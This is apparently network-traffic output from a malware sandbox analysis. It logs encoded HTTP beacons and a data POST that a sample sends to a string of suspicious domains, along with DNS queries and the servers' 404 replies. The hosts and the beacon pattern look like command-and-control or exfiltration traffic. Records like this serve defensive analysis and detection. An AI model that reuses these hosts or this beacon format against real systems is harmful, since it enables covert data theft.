Source: global traffic	HTTP traffic detected: GET /bio5/?XHUtU=7nMcQ+p/VAEQ2azQobfLLk4wRClPro4nkTeWIV8mecaktUDEYNaH1yi6Gw2pgnszfL4ShPP5kx9f65xk5DOH6uuiHc4YC+tLjkWWBGbbvYq75oa+pjtqeeHcG0lj96z8LA==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.thefounder.ceoUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /2dxw/?XHUtU=53Ecfr8B68ed/Blg+8N/NSWf2AxVSX5XzowAhVF0Im0gjpOoyg3aVrzjUCT/Cf1+dwJRkAgo8V3FznBqNeiDzdYfw3xDcQr8Se8sECh3iguJ/J/JYFBf2UKrXqcOWenkdA==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.rbopisalive.cyouUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /j7xf/?XHUtU=EoO1UT5Wd2PGx3MxjK+kz3siU+40EUNjjQBsBAQWNKytFXrnqux0YvA75VbZy52yQ1EBW1TgMDX5nQfvFmbNI4J+GjHKZe38e6p27Nznz96ZmHa0/sD4fpipy8dpJoiSEg==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.spacewalker.appUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /5o3b/?XHUtU=aMDQ2zlSfVAnRg1MbENUzA6lEcrkPshwQ1hE+7gf/URoUExZouIubEid9yVe9hJJbXBuu3jvryMBZzKz5ikAWWAc1/kk2litQM6UNr9O2sHGk833jxyzNeps1dY3SETauQ==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.ufin89.bizUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ugkq/?XHUtU=2IPNaPUBIEKLMYet/IA/vDlOsmY0rTj1Sq4y45D8jA04/h+slag64ifzswuCNybk3ABolq+6ms7eRJi+n4lhKX9n5jztlFaO1QdGkZFJOErbtOlonkRN5R9406cKHPJ40w==&spy=cNV04zyxHZZ HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Connection: closeHost: www.usastakes.xyzUser-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.loonerverse.app
Source: global traffic	DNS traffic detected: DNS query: www.primepath.net
Source: global traffic	DNS traffic detected: DNS query: www.031233435.xyz
Source: global traffic	DNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
Source: global traffic	DNS traffic detected: DNS query: www.publicblockchain.xyz
Source: global traffic	DNS traffic detected: DNS query: www.multo.xyz
Source: global traffic	DNS traffic detected: DNS query: www.tkloqr.info
Source: global traffic	DNS traffic detected: DNS query: www.streaay.live
Source: global traffic	DNS traffic detected: DNS query: www.77zhibo.net
Source: global traffic	DNS traffic detected: DNS query: www.thefounder.ceo
Source: global traffic	DNS traffic detected: DNS query: www.rbopisalive.cyou
Source: global traffic	DNS traffic detected: DNS query: www.spacewalker.app
Source: global traffic	DNS traffic detected: DNS query: www.ufin89.biz
Source: global traffic	DNS traffic detected: DNS query: www.usastakes.xyz

Source: unknown

HTTP traffic detected: POST /esw3/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 206Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.primepath.netOrigin: http://www.primepath.netReferer: http://www.primepath.net/esw3/User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36Data Raw: 58 48 55 74 55 3d 66 52 67 6e 4e 56 4e 53 56 54 69 4d 64 58 4b 48 68 57 4e 41 70 46 70 46 34 4d 68 39 48 55 37 63 38 4c 4c 48 34 71 62 2b 58 50 43 62 49 51 33 6a 77 52 6c 77 4f 47 6f 77 71 75 50 36 79 53 4a 38 73 34 68 53 62 58 63 4a 4a 4b 65 51 67 36 73 48 43 6a 75 46 51 31 56 46 4a 48 59 79 4c 4e 56 61 47 56 56 64 67 4f 75 4c 68 53 45 63 4b 52 71 52 56 7a 50 54 33 55 57 31 35 30 61 35 67 52 65 39 4b 71 68 47 61 33 57 35 4c 71 56 77 30 37 2b 6d 65 32 70 39 48 45 30 32 6b 62 34 33 42 35 2f 32 7a 54 50 42 6c 4c 5a 50 44 6e 32 34 47 2b 47 37 56 68 33 72 59 63 4f 6b 32 70 50 49 6e 61 75 62 73 71 78 76 36 4c 63 3d Data Ascii: XHUtU=fRgnNVNSVTiMdXKHhWNApFpF4Mh9HU7c8LLH4qb+XPCbIQ3jwRlwOGowquP6ySJ8s4hSbXcJJKeQg6sHCjuFQ1VFJHYyLNVaGVVdgOuLhSEcKRqRVzPT3UW150a5gRe9KqhGa3W5LqVw07+me2p9HE02kb43B5/2zTPBlLZPDn24G+G7Vh3rYcOk2pPInaubsqxv6Lc=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Mar 2025 14:14:54 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 265Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 6f 6e 65 72 76 65 72 73 65 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.loonerverse.app Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 06 Mar 2025 14:15:10 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 06 Mar 2025 14:15:13 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 06 Mar 2025 14:15:15 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 14:15:24 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 14:15:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 14:15:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Mar 2025 14:15:32 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
